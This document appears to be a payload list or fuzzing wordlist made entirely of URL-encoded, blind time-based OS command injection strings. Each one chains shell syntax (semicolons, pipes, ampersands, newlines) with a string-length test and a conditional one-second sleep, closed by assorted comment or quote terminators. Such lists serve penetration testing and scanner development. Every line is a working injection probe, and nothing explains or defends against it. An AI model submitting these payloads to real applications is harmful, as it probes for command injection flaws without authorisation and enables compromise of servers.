+os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C' 